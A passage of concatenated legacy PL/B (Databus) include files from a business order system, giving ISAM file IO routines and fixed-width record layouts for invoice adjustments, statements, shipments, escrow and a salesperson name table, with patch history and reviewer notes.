NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGDel
. REQUIRED : Previous valid read
. RETURNED :
. DESCRIPTION : Isam Delete
.
NINVBRKGdel BRANCH NINVBRKGFLAG TO NinvBrkg7
CALL NINVBRKGOPEN
NINVBRKG7 FILEPI 1;NINVBRKGFILE
Delete NINVBRKGFILE,NinvBRKGfld
RETURN
..............................................................................
.
. ENTRY POINT : NINVBRKGOPEN
. REQUIRED : 'NINVBRKGFLAG'
. RETURNED : 'NINVBRKGFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
..............................................................................
NINVBRKGOPEN TRAP NinvBrkGGONE IF IO
OPEN NINVBRKGFILE,NINVBRKGNAME
TRAPCLR IO
MOVE C1 TO NINVBRKGFLAG
RETURN
..............................................................................
.on open failure: report the missing file via the shared FILEGONE handler
NINVBRKGGONE MOVE NINVBRKGNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/njstdd.inc
..............................................................................
.
. NJSTDD INCLUSION
. NIN DETAIL ADJUSTMENT FILE DEFINITION
.
. FILE NAME : NADJUST
. REC LENGTH: 177 FIXED
. INDEX KEY : 119-124,140-141 (INVOICE#, SUB#)
.
.Patch 1.6 PLI
.PATCH 1.5 IP address of File Manager Changed
.PATCH 1.3 ADDED AAMFILE AND FILELIST
.begin patch 1.2 10Mar99 DLH
. qty & reason field added 06jun95. DLH
.
..............................................................................
.
.begin patch 1.2
.NJSTFILE IFILE KEYLEN=7,FIX=122,UNCOMP
.START PATCH 1.3 REPLACED LOGIC
.NJSTFILE IFILE KEYLEN=8,FIX=177,UNCOMP
.>Patch 1.5 Begin
.NADJUST file set: ISAM (key = invoice# + sub#, positions 119-124,141-142)
.plus AAM alternate access; records are 188 bytes (see NOTE below).
NJSTLIST Filelist
.NJSTFILE IFILE KEYLEN=8,FIX=177,UNCOMP,Name="NADJUST.ISI|20.20.30.103:502 "
.begin patch 1.6
.NJSTFILE IFILE KEYLEN=8,FIX=177,UNCOMP,Name="NADJUST.ISI|NINS1:502 "
NJSTFILE IFILE KEYLEN=8,FIX=188,UNCOMP,Name="NADJUST.ISI|NINS1:502 "
.NJSTFLE2 AFILE FIX=177,Name="NADJUST.AAM|20.20.30.103:502 "
.NJSTFLE2 AFILE FIX=177,Name="NADJUST.AAM|NINS1:502 "
NJSTFLE2 AFILE FIX=188,Name="NADJUST.AAM|NINS1:502 "
.end patch 1.6
.NJSTFLE2 AFILE FIX=177,Name="NADJUST.AAM"
Filelistend
.END PATCH 1.3 REPLACED LOGIC
.end patch 1.2
NJSTFLSQ FILE
;NJSTNAME INIT "NADJUST "
.NJSTNAME INIT "NADJUST.ISI|20.20.30.103:502 "
NJSTNAME INIT "NADJUST.ISI|NINS1:502 "
.>Patch 1.5 End
.>Patch 1.4
NJSTNAMESEQ INIT "NADJUST "
.>Patch 1.4
.begin patch 1.2
.NJSTFLD DIM 7
NJSTFLD DIM 8
NJSTFLD1 DIM 9
.begin patch 1.2
NJSTFLAG FORM 1
NJSTFLG2 FORM 1
.
.jstvars: NADJUST record layout (byte positions noted per field)
jstvars list
JSTBUSY DIM 1 001-001 BUSY BYTE and code 'J'
JSTSTAT DIM 1 002-002 STATUS '0 ORD P'
JSTMLR DIM 4 003-006 MAILER CODE
JSTLR DIM 6 007-012 LR#
JSTBILTO DIM 1 013-013 BILL-TO CODE
JSTPAYTO DIM 1 014-014 PAY-TO CODE
.begin patch 1.2
..JSTAR DIM 7 015-021 A/R ADJUSTMENT
.JSTAP1 DIM 7 022-028 A/P1 ADJUSTMENT
.JSTAP2 DIM 7 029-035 A/P2 ADJUSTMENT
.JSTFIL1 DIM 1 036-036
.JSTLRINC DIM 6 037-042 LR INCOME ADJUSTMENT
JSTAR form 9.2 015-026 A/R ADJUSTMENT
JSTAP1 form 9.2 027-038 A/P1 ADJUSTMENT
JSTAP2 form 9.2 039-050 A/P2 ADJUSTMENT
jstap3 form 9.2 051-062 A/P3 ADJUSTMENT
JSTLRINC form 9.2 063-074 LR INCOME ADJUSTMENT
JSTNININC form 9.2 075-086 NIN NON comm INCOME ADJUSTMENT
.end patch 1.2
JSTREUSE DIM 1 087-087 RE-USE/RUN CHARGE CODE
JSTCD DIM 1 088-088 CREDIT/DEBIT CODE
JSTCRCT DIM 1 089-089 CORRECT/ADDITIONAL BILL CODE
.begin patch 1.2
.JSTSTAX DIM 5 046-050 STATE TAX ADJUSTMENT
.JSTPOST DIM 4 051-054 POSTAGE ADJUSTMENT
.JSTCTAX DIM 5 055-059 CITY ADJUSTMENT
JSTSTAX form 5.2 090-097 STATE TAX ADJUSTMENT
JSTPOST form 5.2 098-105 POSTAGE ADJUSTMENT
JSTCTAX form 5.2 106-113 CITY ADJUSTMENT
.end patch 1.2
JSTREASN DIM 2 114-115 REASON CODE
JSTCNT DIM 3 116-118 CONTACT CODE
.begin patch 1.2
.JSTDATE DIM 6 071-076 ADJUSTMENT DATE
JSTINVNO DIM 6 119-124 INVOICE NUMBER
JSTDATE DIM 8 125-132 ADJUSTMENT DATE ccyymmdd
.JSTINVDT DIM 6 077-082 INVOICE DATE
.JSTSUBNO DIM 1 083-083 ADJUSTMENT AMENDMENT NUMBER
JSTINVDT DIM 8 133-140 INVOICE DATE ccyymmdd
JSTSUBNO DIM 2 141-142 ADJUSTMENT AMENDMENT NUMBER
.end patch 1.2
JSTISTAT DIM 1 143-143 INVOICE STATUS
.begin patch 1.2
.JSTFIL6 DIM 6 085-090
.jstqty dim 7 119-7 qty adjusted to ....
jstqty dim 9 144-152 qty adjusted to ....
.end patch 1.2
jstqrsn dim 25 153-177 reason for qty adjustment.
.begin patch 1.6
JSTXNINC form 9.2 178-188 NIN NON comm INCOME ADJUSTMENT
.NOTE(review): a form 9.2 occupies 12 bytes elsewhere in this record
.(cf. JSTAR at 015-026), so JSTXNINC at 178 would end at 189, yet the
.files above are declared FIX=188 and the positions say 178-188 --
.confirm the intended record length / field position before relying on it.
.end patch 1.6
listend
<file_sep>/include/nstedd.inc
..............................................................................
.
. NSTEDD INCLUSION
. NIN STATEMENT FILE
.
. FILE NAME : NINSTE
. REC LENGTH: 176
. INDEX KEY :
.
.patch 07Dec07 DLH 1.22 - Create Pl FIle
.patch 18mar04 Jd 1.21 - turned on steadjsw.
.patch 27apr99 DLH 1.2 - nininv y2k increased check date year
.revised 20Jan99 Patch #1.1 - NINORD Y2K, increased Mail Date Year
.revised 10mar95 add adjustment switch
.REVISED 27dec94 expanded client name field from 5 to 25.
.REVISED 28JUN94 ADD OWNER NUMBER & check date.
.revised 03FEB94 TO INCLUDE ORDER SALESPERSON #.
.revised 27apr93 to include broker/contact number
.revised 19apr93 filler was 4 now 3, outside guar code added,
. pulled from order.
..............................................................................
.
.Start Patch #1.1 - increased var
.NSTEFILE FILE FIX=155
.NSTEFILE FILE FIX=160
.End Patch #1.1 - increased var
.begin patch 1.2
.NINSTE statement file: 176-byte fixed records, no index (plain FILE)
NSTEFILE FILE FIX=176
.end patch 1.2
.begin patch 1.22
NSTEPFILE FILE FIX=176
.end patch 1.22
NSTENAME INIT "NINSTE|NINS1:502 "
NSTEFLAG FORM 1
.
.stevars: NINSTE record layout (byte positions noted per field)
stevars list
STECODE DIM 2 001-002 FILLER 'F0'
STEMLR DIM 4 003-006 MAILER NUMBER
STELR DIM 6 007-012 LR NUMBER
STEBILTO DIM 1 013-013 BILL-TO CODE.
STEINVNO DIM 6 014-019 INVOICE NUMBER
.Start Patch #1.1 - increased var
.STEINVDT DIM 6 020-025 INVOICE DATE (MMDDYY)
.STEAR DIM 8 026-033 A/R (NO DECIMAL)
STEINVDT DIM 8 020-027 INVOICE DATE (CCYYMMDD)
.begin patch 1.2
.STEAR DIM 9 028-036 A/R (NO DECIMAL)
STEAR form 10.2 028-040 A/R
.end patch 1.2
.End Patch #1.1 - increased var
STECNT DIM 3 041-043 MAILER CONTACT#
STEMLRPO DIM 12 044-055 MAILER PO
.Start Patch #1.1 - increased var
.STEAP1 DIM 7 049-055 A/P1 (NO DECIMAL)
.STEAP2 DIM 9 056-064 A/P2 (NO DECIMAL)
.STEMLDDT DIM 6 065-070 MAIL DATE (MMDDYY)
.begin patch 1.2
.STEAP1 DIM 9 052-060 A/P1 (NO DECIMAL)
.STEAP2 DIM 9 061-069 A/P2 (NO DECIMAL)
STEAP1 form 10.2 056-068 A/P1
STEAP2 form 10.2 069-081 A/P2
.end patch 1.2
STEMLDDT DIM 8 082-089 MAIL DATE (CCYYMMDD)
.End Patch #1.1 - increased var
STEGRNTE DIM 1 090-090 GUARANTEED PAYMENT CODE (*)
STELNAME DIM 35 091-125 LIST NAME
STEGUAR DIM 1 126-126 OUTSIDE GUARANTY. 19APR93 DLH
STEFIL3 DIM 3 127-129 filler 19apr93
STECNAME DIM 25 130-154 CLIENT NAME (FOR ALPHA SORTING)
stebrk dim 4 155-158 broker/consultant number
stebrkct dim 3 159-161 " " contact number
STESLS10 DIM 1 162-162 TENS DIGIT SALESPERSON NUMBER
STESALES DIM 1 163-163 ONES DIGIT SALESPERSON NUMBER
STEOWN DIM 4 164-167 LIST OWNER NUMBER.
.steckdte dim 6 156-161 inv check paid date
steckdte dim 8 168-175 inv check paid date ccyymmdd
steadjsw dim 1 176-176 1=adjusted 2=adjusted shortpay 18mar04 jd
listend
<file_sep>/include/Nuseio.inc
...............................................................................
. .
.NUSEIO.INC - IO MODULE FOR DATABUS PORT/USER IDENTIFICATION. .
...............................................................................
. FILENAME: NINUSERS
. LENGTH: 45 FIXED
. ACCESS: ISI
. KEY : 1-3 (PORT NUMBER)
. 29-31 (TYPIST INITIALS)
..............................................................................
. patch 1.1 06SEP2005 ASH Added FileList logic - Rewrote ALL routines
.add call to trim plb 8.6 appears to have a problem with trailing blanks on nt4 machines
.REVISED 04FEB92
.CREATED 13 JUNE 90.
...............................................................................
.
. ENTRY POINT : NUSEKEY
. REQUIRED : 'NUSEFLD'
. RETURNED : USERS RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
.NUSEKEY: exact key read; NUSEPATH selects which index is used
.(path 1 = port-number key NUSEFLD, path 2 = typist-initials key NUSEFLD2).
NUSEKEY
BRANCH NUSEPATH,NUSE1A,NUSE1C
NUSE1A
BRANCH NUSEFLAG,NUSE1B
CALL NUSEOPEN
NUSE1B
. FILEPI 1;NUSEFILE
READ NUSEFILE,NUSEFLD;NUSEVARS
RETURN
NUSE1C
BRANCH NUSEFLAG,NUSE1D
CALL NUSEOPEN
NUSE1D
. FILEPI 1;NUSEFLE2
READ NUSEFLE2,NUSEFLD2;NUSEVARS
RETURN
...............................................................................
.
. ENTRY POINT : NUSETST
. REQUIRED : NUSEFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NUSETST
BRANCH NUSEPATH,NUSE2A,NUSE2C
NUSE2A
BRANCH NUSEFLAG,NUSE2B
CALL NUSEOPEN
NUSE2B
. FILEPI 1;NUSEFILE
READ NUSEFILE,NUSEFLD;;
RETURN
NUSE2C
BRANCH NUSEFLAG,NUSE2D
CALL NUSEOPEN
NUSE2D
. FILEPI 1;NUSEFLE2
READ NUSEFLE2,NUSEFLD2;;
RETURN
...............................................................................
.
. ENTRY POINT : NUSEKS
. REQUIRED :
. RETURNED : USERS RECORD
. DESCRIPTION : KEY SEQUENTIAL MAILER FILE READ
.
NUSEKS
BRANCH NUSEPATH,NUSE3A,NUSE3C
NUSE3A
BRANCH NUSEFLAG,NUSE3B
CALL NUSEOPEN
NUSE3B
. FILEPI 1;NUSEFILE
READKS NUSEFILE;NUSEVARS
RETURN
NUSE3C
BRANCH NUSEFLAG,NUSE3D
CALL NUSEOPEN
NUSE3D
. FILEPI 1;NUSEFLE2
READKS NUSEFLE2;NUSEVARS
RETURN
..............................................................................
.
. ENTRY POINT : NUSESEQ
. REQUIRED :
. RETURNED : USERS RECORD
. DESCRIPTION : SEQUENTIAL USER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NUSESEQ
BRANCH NUSEFLAG,NUSE4
CALL NUSEOPEN
NUSE4
. FILEPI 1;NUSEFILE
READ NUSEFILE,SEQ;NUSEVARS
RETURN
..............................................................................
.
. ENTRY POINT : NUSEWRT
. REQUIRED : 'NUSEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NUSEWRT
BRANCH NUSEFLAG,NUSE5
CALL NUSEOPEN
NUSE5
FILEPI 1;NUSEFLIST
WRITE NUSEFLIST;NUSEVARS
RETURN
...............................................................................
.
. ENTRY POINT : NUSEUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE USER FILE
.
NUSEUPD
BRANCH NUSEFLAG,NUSE6
CALL NUSEOPEN
NUSE6
FILEPI 1;NUSEFLIST
UPDATE NUSEFLIST;NUSEVARS
RETURN
...............................................................................
.
. ENTRY POINT : NUSEDEL
. REQUIRED : 'NUSEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NUSEDEL
BRANCH NUSEFLAG,NUSE7
CALL NUSEOPEN
NUSE7
FILEPI 1;NUSEFLIST
.NOTE(review): DELETE is issued without an explicit key operand, unlike the
.other IO modules (e.g. NINVBRKGdel) -- presumably it acts on the filelist's
.current record; confirm against the PL/B DELETE statement reference.
DELETE NUSEFLIST
RETURN
...............................................................................
.
. ENTRY POINT : NUSEOPEN
. REQUIRED : 'NUSEFLAG'
. RETURNED : 'NUSEFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN NINUSER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NUSEOPEN
TRAP NUSEGONE giving Error if IO
OPEN NUSEFLIST
trapclr IO
MOVE C1,NUSEFLAG
RETURN
.
.on open failure: report the missing file via the shared FILEGONE handler
NUSEGONE
MOVE NUSENAME TO FILENAME
CALL FILEGONE
.
..............................................................................<file_sep>/include/nshpdd.inc
..............................................................................
.
. NSHPDD INCLUSION
. NIN SHIPMENT FILE DEFINITION
.
. FILE NAME : NINSHP
. REC LENGTH: 136 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
.PATCH 1.4 18JUN2005 DMB Changed IP address of File Manager
.PATCH 1.3 09May2003 ASH Added new fields
.PATCH 1.2 increased STrack 09Apr01 DLH
.PATCH 1.1 increased SQTY 10Jun99 ASH
.tracking number added 07oct98 DLh
.date converted 15Jul98 DLH
..............................................................................
.
.NINSHP shipment file: ISAM keyed on LR number (positions 1-6), 136-byte records
NSHPFILE IFILE KEYLEN=6
.NSHPFILE IFILE KEYLEN=6,FIXED=136
.>Patch 1.4 Begin
.NSHPNAME INIT "NINSHP.ISI|20.20.30.103:502"
NSHPNAME INIT "NINSHP.ISI|NINS1:502"
.>Patch 1.4 End
NSHPFLD DIM 6
NSHPFLAG FORM 1
nshplock form 1 0 OR 1=filepi,2=recordlock, 3=no lock.
.
.shpvars: NINSHP record layout (byte positions noted per field)
shpvars list
SLRNUM DIM 6 001-006 LR NUMBER
SINFO DIM 36 007-042 SHIPPING TEXT EXPLANATION
SCODE DIM 1 043-043 HOW SHIP INFO WAS RECEIVED (C,P,S,I,R,T,A,F,Z,X)
.SDATE DIM 6 044-049 SHIPMENT DATE mmddyy
SDATE DIM 8 044-051 SHIPMENT DATE ccyymmdd
SPOST DIM 4 052-055 SHIPPING COST
.START PATCH 1.1 - REPLACED LOGIC
.SQUANT DIM 7 056-062 SHIP QUANTITY
SQUANT DIM 9 056-064 SHIP QUANTITY
.END PATCH 1.1 - REPLACED LOGIC
.begin patch 1.2
.Strack DIM 15 065-079 Tracking number
Strack DIM 25 065-089 Tracking number
.end patch 1.2
SINITS DIM 3 090-092 Initials of person who created record
SRDATE DIM 8 093-100 Date record was created
SPINITS DIM 3 101-103 Initials of person who Printed record
SPDATE DIM 8 104-111 Date record was Printed
SFILLER DIM 25 112-136 Filler
listend
.
..............................................................................
<file_sep>/include/NESCDD.INC
******************************************************************************
*VARIABLE INCLUSION FOR CLIENT ESCROW FILE
******************************************************************************
* FILE: ESCROW
* RECORD SIZE:
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 MLR/broker NUMBER 1-12
* KEY: 2 OWNER/list NUMBER 13-18,19-24
******************************************************************************
. Patch 1.1 01/10/2005 ASH Converted Mailer/Broker fields
.patch 1.2 add type of escrow DLH
.
.START PATCH 1.1 REPLACED LOGIC
.NESCFILE IFILE KEYLEN=8,dup
.NESCFLE2 IFILE KEYLEN=10,FIXED=18
..
.NESCFLAG FORM 1
.NESCFLG2 FORM 1
.NESCPATH FORM 1
.NESCNAME INIT "ESCROW "
.NESCNME2 INIT "ESCROW2 "
..
.NESCFLD DIM 8
.NESCFLD2 DIM 10
..
.NESCMLR DIM 4 1-4 MAILER
.NESCBRK DIM 4 5-8 BROKER NUMBER
.NESCOWN DIM 4 9-12 OWNER
.NESClist DIM 6 13-18 list #
............................................................................
.ESCROW file set: two ISAM paths -- key 1 = mailer+broker (1-12, dups
.allowed), key 2 = owner+list (13-24) on the 60-byte Escrow2 file.
NEscFlist Filelist
NESCFILE IFILE KEYLEN=12,dup,Name="Escrow.ISI|NINS1:502"
NESCFLE2 IFILE KEYLEN=12,FIXED=60,Name="Escrow2.ISI|NINS1:502"
FILELISTEND
.
NESCFLAG FORM 1
NESCFLG2 FORM 1
NESCPATH FORM 1
NESCNAME INIT "ESCROW "
NESCNME2 INIT "ESCROW2 "
.
NESCFLD DIM 12 .mailer & broker key
NESCFLD2 DIM 12 .owner & list
NESCLOck FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
.
.Nescvars: escrow record layout (byte positions noted per field)
Nescvars List
NESCMLR DIM 6 1-6 MAILER
NESCBRK DIM 6 7-12 BROKER NUMBER
NESCOWN DIM 6 13-18 OWNER
NESClist DIM 6 19-24 list #
NEscBDate Dim 8 25-32 Begin date --- not yet implemented
NEscSDate Dim 8 33-40 Stop date --- not yet implemented
.begin patch 1.2
NescType Dim 1 41-41 '2' = Paid Monthly '1'= quarterly '3' = Acquisition
NescFill Dim 19 42-60
Listend
.end patch 1.2
.END PATCH 1.1 REPLACED LOGIC
<file_sep>/include/oslspern.inc
.; Last change: JD 11 May 2007 Added <NAME>
.; Last change: JD 23 Apr 2007 Added <NAME>
.; Last change: JD 23 Apr 2007 Added <NAME>
.; Last change: JD 08 Mar 2007 Added Gayle,<NAME>,Thay
.; Last change: JD 26 Feb 2007 Added Karla,Pam,Demaris PL
.; Last change: JD 29 Dec 2006 Added <NAME> to #12
.; Last change: JD 05 Jul 2006 Added <NAME> to #15.
.; Last change: JD 14 Mar 2006 Added TF to #17.
.; Last change: DM 07 Nov 2005 Changed BC's old #13 to AK
.; Last change: JD 06 Sep 2005 Added CB # 15..
.; Last change: JD 04 Apr 2005 BLO,SK,JC,BS turned off.
.; Last change: JD 31 Jan 2002 8:10 am
.; 14Apr04 added sk to sls19 listmgmt.
.; 15Mar05 added DC to sls12 brokerage.
*..............................................................................
* OSLSPERN/INC - ORDER SALES PERSON TABLE. 21OCT87
* variables should be padded out to 25 to avoid pcbus problem
* Any changes here also need to be made in Ncnt0001
*..............................................................................
.OSLS table: order salesperson number -> display name.
.Values are padded to 25 characters (pcbus workaround noted in header);
.any change here must also be made in Ncnt0001 (and see note after READ2
.in salesprt).  OSLS19 and OSLS30 are reserved for list management.
OSLS0 INIT "no salesperson "
OSLS1 INIT "<NAME> "
.OSLS1 INIT "<NAME> " started 11/17/03
.OSLS1 INIT "<NAME>. " left 11/2001
.OSLS2 INIT "Bonnie " Left 11/2003
OSLS2 INIT "<NAME> - LM "
OSLS3 INIT "<NAME> "
.OSLS4 INIT "<NAME> "
OSLS4 INIT "<NAME> " .2015 May 20
.OSLS5 INIT "<NAME> " .start 02/07
OSLS5 INIT "<NAME> " .start 2015
.OSLS5 INIT "<NAME> " .left 12/06
OSLS6 INIT "List Management " .7/90
.OSLS7 INIT "<NAME> " Left 12/2004
OSLS7 INIT "<NAME> " .added 10/07/15
.OSLS8 INIT "Jeanette " Left 12/2004
OSLS8 INIT "<NAME> " .added 25June2010
OSLS9 INIT "Cold calls "
OSLS10 INIT "<NAME> "
.OSLS10 INIT "<NAME> " left 4/99.
.OSLS11 INIT "<NAME> " Left 12/2004
OSLS11 INIT "<NAME> " left 9/25/2015
.OSLS11 INIT " "
OSLS12 INIT "<NAME> " started 2/07
.OSLS12 INIT "<NAME> "
.OSLS12 INIT "<NAME> " started 03/05
.OSLS12 INIT "<NAME> "
OSLS13 INIT "<NAME> " .Married 10/07
.OSLS13 INIT "<NAME> " .start 02/07
.OSLS13 INIT "<NAME> "
.OSLS13 INIT "<NAME> "
.OSLS13 INIT " "
OSLS14 INIT "<NAME> "
OSLS15 INIT "<NAME> " started 05/06
.OSLS15 INIT "<NAME> " started 09/05
.oSLS15 INIT "<NAME> " *fixed by dh 1/10
OSLS16 INIT "<NAME> "
OSLS17 INIT "<NAME> " started 03/14/06
OSLS18 INIT "<NAME> " started 03/06
.OSLS19 INIT "<NAME> " ***************OSLS19 reserved for list management only!!!!!!!!!!!!!!!!!!!!!!
OSLS19 INIT "<NAME> " ***************OSLS19 reserved for list management only!!!!!!!!!!!!!!!!!!!!!!
OSLS20 INIT "<NAME> "
OSLS21 INIT "<NAME> "
.OSLS22 INIT "<NAME> " left 8/99
OSLS22 INIT "<NAME> "
.OSLS23 INIT "<NAME> "
OSLS23 INIT "<NAME> " .July 15 2015
OSLS24 INIT "<NAME> "
OSLS25 INIT "<NAME> "
OSLS26 INIT "<NAME> "
.OSLS27 INIT "<NAME> " 2/1/08
OSLS27 INIT "List Management-NIN/PLI "
OSLS28 INIT "<NAME> "
OSLS29 INIT "<NAME> "
.OSLS30 INIT "<NAME> " .reserved for LM
OSLS30 INIT "<NAME>(LM) " .2015 Mar 13 .reserved for LM
OSLS31 INIT "<NAME> " .added 12/17/08
OSLS32 INIT "<NAME> " .added 04/25/2012
OSLS33 INIT " "
OSLS34 INIT " "
OSLS35 INIT "Imported PL Brokerage "
.OSLS1 INIT "ardis "
.OSLS1 INIT " "
.OSLS1 INIT "lisa" left in 1/91.
.OSLS4 INIT "Elaine "
.OSLS5 INIT "Nancy " started april 90
.OSLS5 INIT "kevin " 02/90 left niN
.OSLS6 INIT "ines " not in list mAN.
.OSLS7 INIT "patrick "
.OSLS7 INIT "<NAME>." 04/90 left nin
.OSLS7 INIT "<NAME>" 11/91 left nin
.OSLS7 INIT "meg " 07/93 left sales.
.OSLS7 INIT "julie " started sales person.9/93.
.OSLS7 INIT "<NAME> " started sales person.1/94.
.OSLS9 INIT "cheryl"
.OSLS9 INIT "<NAME>." 02/90 left nin
.OSLS9 INIT "tina maultsby" left 6/90???
.OSLS9 INIT "marguerite salmon" as of 9/13/90, lefT 11/21/90
.OSLS9 INIT "ines" left 3/15/91
.OSLS10 INIT "glendi" left 7/90
.OSLS11 INIT "<NAME> "
.OSLS11 INIT "<NAME>. " 1/93 left nin
.OSLS12 INIT "<NAME>." 07/89 left nin
.OSLS12 INIT "james" 09/90 left 3/92
.OSLS12 INIT "<NAME> "
.OSLS12 INIT "<NAME> " left 10/98
.OSLS13 INIT "regina"
.OSLS13 INIT "jone" 02/90 left nin
.OSLS13 INIT "<NAME>" moved to ssg 7/90
.OSLS13 INIT "<NAME> "
.OSLS15 INIT "<NAME>." 04/90 left nin
.OSLS15 INIT "<NAME> " left 12/98 *fixed by dh 1/10
. *dont change it!
.OSLS16 INIT "larry" 10/89 left nin
.OSLS16 INIT "rebecca "
.OSLS17 INIT "elizabeth" 04/90 left nin
.OSLS17 INIT "<NAME> "
.OSLS18 INIT "yolanda " 08/89 left niN
.OSLS18 INIT "beth" 12/91 letf nin
.***************OSLS19 reserved for list management only!!!!!!!!!!!!!!!!!!!!!!
.OSLS19 INIT "<NAME>." 04/91 left nin
.............................................................................
.OSLS20 INIT "<NAME>" moved to ssg 7/90
.OSLS21 INIT "laurie" 7/91 letf nin
.OSLS22 INIT "sonya brown" left 3/92
.OSLS23 INIT " "
.OSLS24 INIT " "
.OSLS25 INIT " "
.OSLS26 INIT " "
.OSLS27 INIT " "
.OSLS28 INIT " "
.OSLS29 INIT " "
...............................................................................
.ANY CHANGES IN THIS table also need to be made in the table in salesprT, AFTER
.PARAGRAPH READ2.
...............................................................................
<file_sep>/include/nord6io.inc
;..............................................................................
;
; NORD6IO INCLUSION
; NIN RECORD NUMBER IO INCLUSION
;
; FILE NAME : NINORD6
;
;
;.............................................................................
;
.NORD6KEY: open on first use, then exact key read of NINORD6.
.NORD6lock selects the locking style on every entry point:
. 1 -> FILEPI-protected read, 2 -> READLK (record lock), 3 -> plain read.
NORD6KEY
BRANCH NORD6FLAG OF NORD61
CALL NORD6OPEN
NORD61 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR61L,NOR61R,NOR61N
NOR61L FILEPI 1;NORD6FILE
READ NORD6FILE,NORD6FLD;ORD6VARS
TRAPCLR IO
RETURN
NOR61R
READLK NORD6FILE,NORD6FLD;ORD6VARS
TRAPCLR IO
RETURN
NOR61N
READ NORD6FILE,NORD6FLD;ORD6VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6TST
; REQUIRED : NORD6FLD
; RETURNED :
; DESCRIPTION : TEST KEY
;
NORD6TST BRANCH NORD6FLAG TO NORD62
CALL NORD6OPEN
NORD62 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR62L,NOR62R,NOR62N
NOR62L FILEPI 1;NORD6FILE
READ NORD6FILE,NORD6FLD;;
TRAPCLR IO
RETURN
NOR62R
READLK NORD6FILE,NORD6FLD;;
TRAPCLR IO
RETURN
NOR62N
READ NORD6FILE,NORD6FLD;;
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6KS
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
;
NORD6KS BRANCH NORD6FLAG TO NORD63
CALL NORD6OPEN
NORD63 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR63L,NOR63R,NOR63N
NOR63L FILEPI 1;NORD6FILE
READKS NORD6FILE;ORD6VARS
TRAPCLR IO
RETURN
NOR63R
READKSLK NORD6FILE;ORD6VARS
TRAPCLR IO
RETURN
NOR63N
READKS NORD6FILE;ORD6VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6SEQ
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
; APPLICATION'S RESPONSIBILITY TO TEST FLAGS
;
NORD6SEQ BRANCH NORD6FLAG TO NORD64
CALL NORD6OPEN
NORD64 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR64L,NOR64R,NOR64N
NOR64L FILEPI 1;NORD6FILE
READ NORD6FILE,SEQ;ORD6VARS
TRAPCLR IO
RETURN
NOR64R
READLK NORD6FILE,SEQ;ORD6VARS
TRAPCLR IO
RETURN
NOR64N
READ NORD6FILE,SEQ;ORD6VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6WRT
; REQUIRED : 'NORD6FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
;
NORD6WRT BRANCH NORD6FLAG TO NORD65
CALL NORD6OPEN
NORD65 TRAP IOMssg Giving Error if IO
FILEPI 1;NORD6FILE
WRITE NORD6FILE,NORD6FLD;ORD6VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6UPD
; REQUIRED : A PREVIOUS KEY READ
; RETURNED :
; DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
;
NORD6UPD BRANCH NORD6FLAG TO NORD66
CALL NORD6OPEN
NORD66 TRAP IOMssg Giving Error if IO
FILEPI 1;NORD6FILE
UPDATE NORD6FILE;ORD6VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6DEL
; REQUIRED : 'NORD6FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
;
NORD6DEL BRANCH NORD6FLAG TO NORD67
CALL NORD6OPEN
NORD67 TRAP IOMssg Giving Error if IO
FILEPI 1;NORD6FILE
DELETE NORD6FILE,NORD6FLD
trapclr IO
RETURN
;...............................................................................
;
; ENTRY POINT : NORD6OPEN
; REQUIRED : 'NORD6FLAG'
; RETURNED : 'NORD6FLAG' SET TO '1' IF OPENNED
; DESCRIPTION : OPEN NIN RECORD NUMBER FILE
; DISPLAY ERROR AND ABORT IF NOT ON-LINE.
;
NORD6OPEN TRAP NORD6GONE IF IO
OPEN NORD6FILE,NORD6NAME
TRAPCLR IO
MOVE C1 TO NORD6FLAG
RETURN
;
NORD6GONE MOVE NORD6NAME TO FILENAME
CALL FILEGONE
;
;.............................................................................
<file_sep>/include/nord7io.inc
;..............................................................................
;
; nord7IO INCLUSION
; NIN RECORD NUMBER IO INCLUSION
;
; FILE NAME : NInord7
;
;
;.............................................................................
;
;.............................................................................
; FIX(review): this include is a clone of nord6io.inc, and the internal
; lock-path labels had been copied verbatim (NOR61L..NOR64N).  A program
; that includes BOTH nord6io.inc and nord7io.inc would define each of those
; labels twice.  They are renamed here to NOR71x..NOR74x.  All public entry
; points (nord7KEY/TST/KS/SEQ/WRT/UPD/DEL/OPEN) are unchanged.
; Lock mode (nord7lock): 1 = FILEPI, 2 = READLK record lock, 3 = no lock.
;.............................................................................
;
; ENTRY POINT : nord7KEY
; REQUIRED    : nord7FLD (exact key), nord7lock
